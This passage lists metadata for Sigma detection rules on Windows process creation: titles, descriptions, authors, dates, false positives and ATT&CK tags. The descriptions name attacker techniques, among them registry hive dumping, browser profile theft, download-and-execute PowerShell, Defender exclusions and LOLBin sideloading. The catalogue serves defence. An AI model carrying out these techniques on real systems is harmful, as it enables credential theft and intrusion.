filename proc_creation_win_susp_non_priv_reg_or_ps.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

Usage Of Web Request Commands And Cmdlets

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine

Internal MISP references

UUID 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d which can be used as unique global reference for Usage Of Web Request Commands And Cmdlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
creation_date 2019/10/24
falsepositive ['Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.']
filename proc_creation_win_susp_web_request_cmd_and_cmdlets.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

Using SettingSyncHost.exe as LOLBin

Detects using SettingSyncHost.exe to run a hijacked binary

Internal MISP references

UUID b2ddd389-f676-4ac4-845a-e00781a48e5f which can be used as unique global reference for Using SettingSyncHost.exe as LOLBin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Anton Kutepov, oscd.community
creation_date 2020/02/05
falsepositive ['Unknown']
filename proc_creation_win_lolbin_settingsynchost.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1574.008']
Related clusters

Suspicious Process Parents

Detects suspicious parent processes that should not have any children or should only have a single possible child program

Internal MISP references

UUID cbec226f-63d9-4eca-9f52-dfb6652f24df which can be used as unique global reference for Suspicious Process Parents in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/21
falsepositive ['Unknown']
filename proc_creation_win_susp_parents.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

Powershell Defender Exclusion

Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets

Internal MISP references

UUID 17769c90-230e-488b-a463-e05c08e9d48f which can be used as unique global reference for Powershell Defender Exclusion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/04/29
falsepositive ['Possible Admin Activity', 'Other Cmdlets that may use the same parameters']
filename proc_creation_win_powershell_defender_exclusion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

Arbitrary Binary Execution Using GUP Utility

Detects execution of the Notepad++ updater (gup) to launch other commands or executables

Internal MISP references

UUID d65aee4d-2292-4cea-b832-83accd6cfa43 which can be used as unique global reference for Arbitrary Binary Execution Using GUP Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/10
falsepositive ['Other parent binaries using GUP not currently identified']
filename proc_creation_win_gup_arbitrary_binary_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious CodePage Switch Via CHCP

Detects a code page switch in command line or batch scripts to a rare language

Internal MISP references

UUID c7942406-33dd-4377-a564-0f62db0593a3 which can be used as unique global reference for Suspicious CodePage Switch Via CHCP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2019/10/14
falsepositive ["Administrative activity (adjust code pages according to your organization's region)"]
filename proc_creation_win_chcp_codepage_switch.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1036', 'attack.defense_evasion']
Related clusters

Kavremover Dropped Binary LOLBIN Usage

Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.

Internal MISP references

UUID d047726b-c71c-4048-a99b-2e2f50dc107d which can be used as unique global reference for Kavremover Dropped Binary LOLBIN Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/01
falsepositive ['Unknown']
filename proc_creation_win_lolbin_kavremover.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

DllUnregisterServer Function Call Via Msiexec.EXE

Detects MsiExec loading a DLL and calling its DllUnregisterServer function

Internal MISP references

UUID 84f52741-8834-4a8c-a413-2eb2269aa6c8 which can be used as unique global reference for DllUnregisterServer Function Call Via Msiexec.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/24
falsepositive ['Unknown']
filename proc_creation_win_msiexec_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

Password Provided In Command Line Of Net.EXE

Detects when net.exe is called with a password in the command line

Internal MISP references

UUID d4498716-1d52-438f-8084-4a603157d131 which can be used as unique global reference for Password Provided In Command Line Of Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton (HAWK.IO)
creation_date 2021/12/09
falsepositive ['Unknown']
filename proc_creation_win_net_use_password_plaintext.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.lateral_movement', 'attack.t1021.002', 'attack.t1078']

Recon Information for Export with Command Prompt

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Internal MISP references

UUID aa2efee7-34dd-446e-8a37-40790a66efd7 which can be used as unique global reference for Recon Information for Export with Command Prompt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/30
falsepositive ['Unknown']
filename proc_creation_win_susp_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1119']

Active Directory Structure Export Via Ldifde.EXE

Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.

Internal MISP references

UUID 4f7a6757-ff79-46db-9687-66501a02d9ec which can be used as unique global reference for Active Directory Structure Export Via Ldifde.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Unknown']
filename proc_creation_win_ldifde_export.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration']

Service Registry Key Deleted Via Reg.EXE

Detects execution of "reg.exe" commands with the "delete" flag on a services registry key. Often used by attackers to remove AV software services.

Internal MISP references

UUID 05b2aa93-1210-42c8-8d9a-2fcc13b284f5 which can be used as unique global reference for Service Registry Key Deleted Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unlikely']
filename proc_creation_win_reg_delete_services.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Potentially Suspicious GoogleUpdate Child Process

Detects potentially suspicious child processes of "GoogleUpdate.exe"

Internal MISP references

UUID 84b1ecf9-6eff-4004-bafb-bae5c0e251b2 which can be used as unique global reference for Potentially Suspicious GoogleUpdate Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Unknown']
filename proc_creation_win_googleupdate_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Shell32 DLL Execution in Suspicious Directory

Detects shell32.dll executing a DLL in a suspicious directory

Internal MISP references

UUID 32b96012-7892-429e-b26c-ac2bf46066ff which can be used as unique global reference for Shell32 DLL Execution in Suspicious Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/11/24
falsepositive ['Unknown']
filename proc_creation_win_rundll32_shell32_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.011']

Potential Active Directory Enumeration Using AD Module - ProcCreation

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration.

Internal MISP references

UUID 70bc5215-526f-4477-963c-a47a5c9ebd12 which can be used as unique global reference for Potential Active Directory Enumeration Using AD Module - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/22
falsepositive ['Legitimate use of the library for administrative activity']
filename proc_creation_win_powershell_active_directory_module_dll_import.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.discovery', 'attack.impact']

Suspicious PowerShell Download and Execute Pattern

Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)

Internal MISP references

UUID e6c54d94-498c-4562-a37c-b469d8e9a275 which can be used as unique global reference for Suspicious PowerShell Download and Execute Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/28
falsepositive ['Software installers that pull packages from remote systems and execute them']
filename proc_creation_win_powershell_susp_download_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Use of Setres.exe

Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path

Internal MISP references

UUID 835e75bf-4bfd-47a4-b8a6-b766cac8bcb7 which can be used as unique global reference for Use of Setres.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022/12/11
falsepositive ['Legitimate usage of Setres']
filename proc_creation_win_lolbin_setres.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1202']

Permission Check Via Accesschk.EXE

Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by Sysinternals and often abused by attackers to verify process privileges

Internal MISP references

UUID c625d754-6a3d-4f65-9c9a-536aea960d37 which can be used as unique global reference for Permission Check Via Accesschk.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/13
falsepositive ['System administrator Usage']
filename proc_creation_win_sysinternals_accesschk_check_permissions.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']

HackTool - SharpLDAPmonitor Execution

Detects execution of SharpLDAPmonitor, which can monitor the creation, deletion and changes of LDAP objects.

Internal MISP references

UUID 9f8fc146-1d1a-4dbf-b8fd-dfae15e08541 which can be used as unique global reference for HackTool - SharpLDAPmonitor Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/30
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharp_ldap_monitor.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']

DLL Sideloading by VMware Xfer Utility

Detects execution of the VMware Xfer utility (VMwareXferlogs.exe) from a non-default directory, which may be an attempt to sideload an arbitrary DLL

Internal MISP references

UUID ebea773c-a8f1-42ad-a856-00cb221966e8 which can be used as unique global reference for DLL Sideloading by VMware Xfer Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/02
falsepositive ['Unlikely']
filename proc_creation_win_dll_sideload_vmware_xfer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']

HackTool - Covenant PowerShell Launcher

Detects suspicious command lines used in Covenant launchers

Internal MISP references

UUID c260b6db-48ba-4b4a-a76f-2f67644e99d2 which can be used as unique global reference for HackTool - Covenant PowerShell Launcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2020/06/04
falsepositive No established falsepositives
filename proc_creation_win_hktl_covenant.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059.001', 'attack.t1564.003']

Sideloading Link.EXE

Detects the execution of utilities often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name.

Internal MISP references

UUID 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6 which can be used as unique global reference for Sideloading Link.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unknown']
filename proc_creation_win_lolbin_sideload_link_binary.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Suspicious Script Execution From Temp Folder

Detects suspicious script executions from a temporary folder

Internal MISP references

UUID a6a39bdb-935c-4f0a-ab77-35f4bbf44d33 which can be used as unique global reference for Suspicious Script Execution From Temp Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
creation_date 2021/07/14
falsepositive ['Administrative scripts']
filename proc_creation_win_susp_script_exec_from_temp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Base64 Encoded PowerShell Command Detected

Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string

Internal MISP references

UUID e32d4572-9826-4738-b651-95fa63747e8a which can be used as unique global reference for Base64 Encoded PowerShell Command Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/01/29
falsepositive ['Administrative script libraries']
filename proc_creation_win_powershell_frombase64string.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1027', 'attack.defense_evasion', 'attack.t1140', 'attack.t1059.001']

New Root Certificate Installed Via CertMgr.EXE

Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID ff992eac-6449-4c60-8c1d-91c9722a1d48 which can be used as unique global reference for New Root Certificate Installed Via CertMgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2023/03/05
falsepositive ["Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"]
filename proc_creation_win_certmgr_certificate_installation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']

Sysinternals PsService Execution

Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering

Internal MISP references

UUID 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f which can be used as unique global reference for Sysinternals PsService Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/16
falsepositive ['Legitimate use of PsService by an administrator']
filename proc_creation_win_sysinternals_psservice.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.persistence', 'attack.t1543.003']

New Firewall Rule Added Via Netsh.EXE

Detects the addition of a new rule to the Windows firewall via netsh

Internal MISP references

UUID cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c which can be used as unique global reference for New Firewall Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Sander Wiebing
creation_date 2019/01/29
falsepositive ['Legitimate administration activity', 'Software installations']
filename proc_creation_win_netsh_fw_add_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004', 'attack.s0246']

Suspicious Download from Office Domain

Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents

Internal MISP references

UUID 00d49ed5-4491-4271-a8db-650a4ef6f8c1 which can be used as unique global reference for Suspicious Download from Office Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/27
falsepositive ['Scripts or tools that download attachments from these domains (OneNote, Outlook 365)']
filename proc_creation_win_susp_download_office_domain.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105', 'attack.t1608']

PsExec/PAExec Escalation to LOCAL SYSTEM

Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights

Internal MISP references

UUID 8834e2f7-6b4b-4f09-8906-d2276470ee23 which can be used as unique global reference for PsExec/PAExec Escalation to LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/11/23
falsepositive ['Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)', 'Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension']
filename proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']

Run PowerShell Script from Redirected Input Stream

Detects PowerShell script execution via input stream redirect

Internal MISP references

UUID c83bf4b5-cdf0-437c-90fa-43d734f7c476 which can be used as unique global reference for Run PowerShell Script from Redirected Input Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
creation_date 2020/10/17
falsepositive ['Unknown']
filename proc_creation_win_powershell_run_script_from_input_stream.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']

Lolbin Defaultpack.exe Use As Proxy

Detects usage of the "defaultpack.exe" binary as a proxy to launch other programs

Internal MISP references

UUID b2309017-4235-44fe-b5af-b15363011957 which can be used as unique global reference for Lolbin Defaultpack.exe Use As Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/31
falsepositive ['Unknown']
filename proc_creation_win_lolbin_defaultpack.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218', 'attack.defense_evasion', 'attack.execution']

Suspicious UltraVNC Execution

Detects suspicious UltraVNC command line flag combinations that indicate an auto reconnect upon execution, e.g. at startup (as seen being used by the Gamaredon threat group)

Internal MISP references

UUID 871b9555-69ca-4993-99d3-35a59f9f3599 which can be used as unique global reference for Suspicious UltraVNC Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/03/04
falsepositive ['Unknown']
filename proc_creation_win_ultravnc_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.g0047', 'attack.t1021.005']

PowerShell Script Run in AppData

Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder

Internal MISP references

UUID ac175779-025a-4f12-98b0-acdaeb77ea85 which can be used as unique global reference for PowerShell Script Run in AppData in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2019/01/09
falsepositive ['Administrative scripts']
filename proc_creation_win_powershell_susp_ps_appdata.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Windows Internet Hosted WebDav Share Mount Via Net.EXE

Detects when an internet hosted webdav share is mounted using the "net.exe" utility

Internal MISP references

UUID 7e6237fe-3ddb-438f-9381-9bf9de5af8d0 which can be used as unique global reference for Windows Internet Hosted WebDav Share Mount Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/21
falsepositive ['Unknown']
filename proc_creation_win_net_use_mount_internet_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']

Suspicious High IntegrityLevel Conhost Legacy Option

ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.

Internal MISP references

UUID 3037d961-21e9-4732-b27a-637bcc7bf539 which can be used as unique global reference for Suspicious High IntegrityLevel Conhost Legacy Option in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/09
falsepositive ['Very Likely, including launching cmd.exe via Run As Administrator']
filename proc_creation_win_conhost_legacy_option.yml
level informational
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']

Suspect Svchost Activity

It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.

Internal MISP references

UUID 16c37b52-b141-42a5-a3ea-bbe098444397 which can be used as unique global reference for Suspect Svchost Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Burkett, @signalblur
creation_date 2019/12/28
falsepositive ['Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf']
filename proc_creation_win_svchost_execution_with_no_cli_flags.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']

HackTool - Jlaive In-Memory Assembly Execution

Detects the use of Jlaive to execute assemblies in a copied PowerShell

Internal MISP references

UUID 0a99eb3e-1617-41bd-b095-13dc767f3def which can be used as unique global reference for HackTool - Jlaive In-Memory Assembly Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
creation_date 2022/05/24
falsepositive ['Unknown']
filename proc_creation_win_hktl_jlaive_batch_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']

Suspicious WmiPrvSE Child Process

Detects suspicious and uncommon child processes of WmiPrvSE

Internal MISP references

UUID 8a582fe2-0882-4b89-a82a-da6b2dc32937 which can be used as unique global reference for Suspicious WmiPrvSE Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_wmiprvse_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1047', 'attack.t1204.002', 'attack.t1218.010']

Enumeration for 3rd Party Creds From CLI

Detects processes that query known 3rd party registry keys that hold credentials via the command line

Internal MISP references

UUID 87a476dc-0079-4583-a985-dee7a20a03de which can be used as unique global reference for Enumeration for 3rd Party Creds From CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename proc_creation_win_registry_enumeration_for_credentials_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.002']

Application Terminated Via Wmic.EXE

Detects calls to the "terminate" function via wmic in order to kill an application

Internal MISP references

UUID 49d9671b-0a0a-4c09-8280-d215bfd30662 which can be used as unique global reference for Application Terminated Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/11
falsepositive ['Unknown']
filename proc_creation_win_wmic_terminate_application.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']

Suspicious Diantz Alternate Data Stream Execution

Detects the use of diantz to compress a target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

Internal MISP references

UUID 6b369ced-4b1d-48f1-b427-fdc0de0790bd which can be used as unique global reference for Suspicious Diantz Alternate Data Stream Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Very Possible']
filename proc_creation_win_lolbin_diantz_ads.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']

Use NTFS Short Name in Image

Detects use of Windows 8.3 short names, which could be used as a method to avoid image-based detection

Internal MISP references

UUID 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b which can be used as unique global reference for Use NTFS Short Name in Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/06
falsepositive ['Software Installers']
filename proc_creation_win_susp_ntfs_short_name_use_image.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']

HackTool - GMER Rootkit Detector and Remover Execution

Detects the execution of the GMER tool based on image and hash fields.

Internal MISP references

UUID 9082ff1f-88ab-4678-a3cc-5bcff99fc74d which can be used as unique global reference for HackTool - GMER Rootkit Detector and Remover Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/05
falsepositive ['Unlikely']
filename proc_creation_win_hktl_gmer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Terminal Service Process Spawn

Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)

Internal MISP references

UUID 1012f107-b8f1-4271-af30-5aed2de89b39 which can be used as unique global reference for Terminal Service Process Spawn in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/05/22
falsepositive ['Unknown']
filename proc_creation_win_svchost_termserv_proc_spawn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1190', 'attack.lateral_movement', 'attack.t1210', 'car.2013-07-002']

Abused Debug Privilege by Arbitrary Parent Processes

Detection of unusual child processes by different system processes

Internal MISP references

UUID d522eca2-2973-4391-a3e0-ef0374321dae which can be used as unique global reference for Abused Debug Privilege by Arbitrary Parent Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Semanur Guneysu @semanurtg, oscd.community
creation_date 2020/10/28
falsepositive ['Unknown']
filename proc_creation_win_susp_abusing_debug_privilege.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']

Direct Autorun Keys Modification

Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.

Internal MISP references

UUID 24357373-078f-44ed-9ac4-6d334a668a11 which can be used as unique global reference for Direct Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.', 'Legitimate administrator sets up autorun keys for legitimate reasons.', 'Discord']
filename proc_creation_win_reg_direct_asep_registry_keys_modification.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Raccine Uninstall

Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.

Internal MISP references

UUID a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc which can be used as unique global reference for Raccine Uninstall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/01/21
falsepositive ['Legitimate deinstallation by administrative staff']
filename proc_creation_win_susp_disable_raccine.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

SQLite Firefox Profile Data DB Access

Detects usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.

Internal MISP references

UUID 4833155a-4053-4c9c-a997-777fcea0baa7 which can be used as unique global reference for SQLite Firefox Profile Data DB Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/08
falsepositive ['Unknown']
filename proc_creation_win_sqlite_firefox_gecko_profile_data.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1539', 'attack.collection', 'attack.t1005']

Rundll32 Execution With Uncommon DLL Extension

Detects the execution of rundll32 with a command line that doesn't contain a common extension

Internal MISP references

UUID c3a99af4-35a9-4668-879e-c09aeb4f2bdf which can be used as unique global reference for Rundll32 Execution With Uncommon DLL Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
creation_date 2022/01/13
falsepositive ['Unknown']
filename proc_creation_win_rundll32_uncommon_dll_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']

Dumping of Sensitive Hives Via Reg.EXE

Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.

Internal MISP references

UUID fd877b94-9bb5-4191-bb25-d79cbd93c167 which can be used as unique global reference for Dumping of Sensitive Hives Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
creation_date 2019/10/22
falsepositive ['Dumping hives for a legitimate purpose, i.e. backup or forensic investigation']
filename proc_creation_win_reg_dumping_sensitive_hives.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005', 'car.2013-07-001']

Remote Access Tool - AnyDesk Execution

